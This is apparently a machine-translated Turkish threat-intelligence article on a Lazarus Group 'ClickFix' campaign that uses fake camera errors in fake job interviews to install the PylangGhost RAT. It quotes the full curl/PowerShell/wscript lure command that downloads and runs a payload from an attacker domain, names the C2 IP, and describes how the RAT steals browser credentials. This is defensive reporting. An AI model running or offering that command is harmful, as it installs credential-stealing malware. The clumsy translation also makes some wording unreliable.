Siber güvenlik araştırmacıları, son haftalarda Kuzey Kore’nin Lazarus Grubuna atfedilen yeni bir sosyal mühendislik kampanyası gözlemlediler ve bu da hedefleri kötü amaçlı komut dosyaları çalıştırmaya zorlamak için sahte kamera ve mikrofon hatalarından yararlandı.
Öncelikle finans ve teknoloji sektörlerinde olan kurbanlar, uzaktan iş görüşmelerine veya aniden durduran teknik değerlendirmelere davet edildiğini bildirerek, sistemlerinin kamera veya mikrofonun engellendiğini iddia eden mesajlar görüntüler.
.webp)
Bu “hatayı” giderme kisvesi altında, şüpheli olmayan kullanıcılara gerçekte Pylangghost Rat olarak bilinen sofistike bir Python tabanlı uzaktan erişim Truva atı getiren ve dağıtan görünüşte zararsız bir komut yürütmeleri istenir.
Kimlik avı e-postaları veya sürücü-by indirmeler gibi geleneksel kötü amaçlı yazılım dağıtım yöntemlerinin aksine, saldırganlar tarafından “ClickFix” olarak adlandırılan bu kampanya, gerçek zamanlı, etkileşimli aldatmaya dayanır.
Kurbanın tarayıcısı, aciliyet ve karışıklık yaratarak “Windows Camera Discovery önbelleğinde yarış koşulu” veya benzer hataların sonsuz bildirimlerini göstermek için manipüle edilir.
Any. run Analistler kaydetti Hedeflere, donanım hatasını çözmek için çok bölümlü bir kabuk komutunu terminaline veya çalıştırma iletişim kutusuna yapıştırması talimatı verilir.
Bunun yerine, bu komut görünmez bir şekilde yeniden adlandırılan bir Python tercümanı içeren bir fermuarlı arşivi çeker ve çekirdek sıçan yükleyicisini başlatmak için VBScript’ten yararlanır.
Daha önce tehditleri tespit etmek için herhangi biriyle SOC performansını güçlendirin.
Pylangghost Sıçan, eski taktikleri modern senaryo dilleriyle birleştirerek Lazarus’un araç setinin en son evrimini temsil ediyor. Güvenlik ekipleri, daha önce Golangghost sıçanını kullanan ünlü Chollima alt grubuna gelişimini izledi.
Python yeniden uygulanması benzer modülerlik sergiler, ancak Python’un kapsamlı standart kütüphanesinden ve şaşkınlık kolaylığından yararlanır.
Altmış antivirüs motorundan üçü kadar düşük kayıtlı yükleyici ikili için ilk virustotal tespitler, kötü amaçlı yazılımların gizliliğinin altını çiziyor.
Any. run Araştırmacılar tanımladı Bu, yükleyici bir arka plan süreci ortaya çıkardıktan sonra, anahtar altındaki Windows kayıt defteri üzerinden kalıcılığı kaydeder Software\Microsoft\Windows\CurrentVersion\Run\csshostve HTTP üzerinden RAW IP 151.243.101.229’da komut ve kontrol (C2) sunucusunu yoklamaya başlar.
.webp)
Bir düzeltme kisvesi altındaki enfeksiyon mekanizması
Pylangghost Rat’ın dağılımı aldatıcı bir şekilde basit bir Windows komutudur. Mağdurlar çalışacak talimatlar alır:-
curl -k -o "%TEMP%\nvidiaRelease.zip" https://360scanner.store/cam-v-b74si.fix; `
powershell -Command "Expand-Archive -Force -Path '%TEMP%\nvidiaRelease.zip' -DestinationPath '%TEMP%\nvidiaRelease'" ; `
wscript "%TEMP%\nvidiaRelease\update.vbs".webp)
Bu tek astar, bir tuzak alanından bir zip arşivi indirir, içeriğini zorla çıkarır ve sessizce yürütür update.vbs.
VBScript, sırayla, bir demonte Lib.zip Aynı dizine meşru bir python ortamı, ardından başlatılır csshost.exePython’un tercümanı için sadece bir takma ad, nvidia.py.
VBScript komutlarını çevre değişkenlerine bölerek ve pencereleri gizleyerek, saldırganlar kullanıcı şüphesini en aza indirir.
Perde arkasında, nvidia.py Yardımcı modülleri içe aktarır (api.py– command.py– util.py– auto.py) yapılandırmayı, RC4/MD5 paket şifrelemesini, komut gönderimi ve kimlik bilgisi eksfiltrasyonunu toplu olarak işleyen.
.webp)
Kalıcılık, “CSSHOST” adlı bir kayıt defteri girişi ile elde edilir ve sıçanın her sistem yeniden başlatılmasında yürütülmesini sağlar.
Kötü amaçlı yazılım, ayrıcalıkları artırarak ve DPAPI şifreleme rutinleri aracılığıyla Chrome’un AES Master Key’i çıkararak tarayıcıda depolanmış kimlik bilgilerini ve kripto para birimi cüzdanı uzantılarını metamask veya Coinbase cüzdanı gibi hedefler.
Chrome V20 veya sonraki sürümleri çalıştıran ortamlarda, sıçan taklit eder lsass.exe Katmanlı şifrelemeyi atlamak için giriş verilerini kesintisiz hasat etmesini sağlamak.
Ağ trafik analizi, çalıntı veriler içeren veya yeni komutlar bekleyen şifreli “qpwoe” paketleri taşıyan C2 sunucusuna tekrarlanan HTTP posta isteklerini ortaya çıkarır.
Gerçek zamanlı sosyal mühendisliği düşük imzalı Python modülleriyle harmanlayarak Lazarus, hem imza tabanlı savunmalardan hem de gündelik kullanıcı incelemesinden kaçınan bir kampanya hazırladı.
Güvenlik ekiplerinden, tanıdık olmayan IP adreslerine giden bağlantıları izlemeleri, uygulama beyaz listelemesini zorunlu kılmaları ve çalışanları keyfi komutlar çalıştırmadan önce uzak sorun giderme isteklerini doğrulama konusunda eğitmeleri istenir.
Herhangi bir.Run tarafından sağlanan gibi sürekli davranış tabanlı kum havuzu, bu ortaya çıkan tehdidi günler yerine dakikalar içinde tespit etmek ve analiz etmek için gereklidir.
Are you from SOC and DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free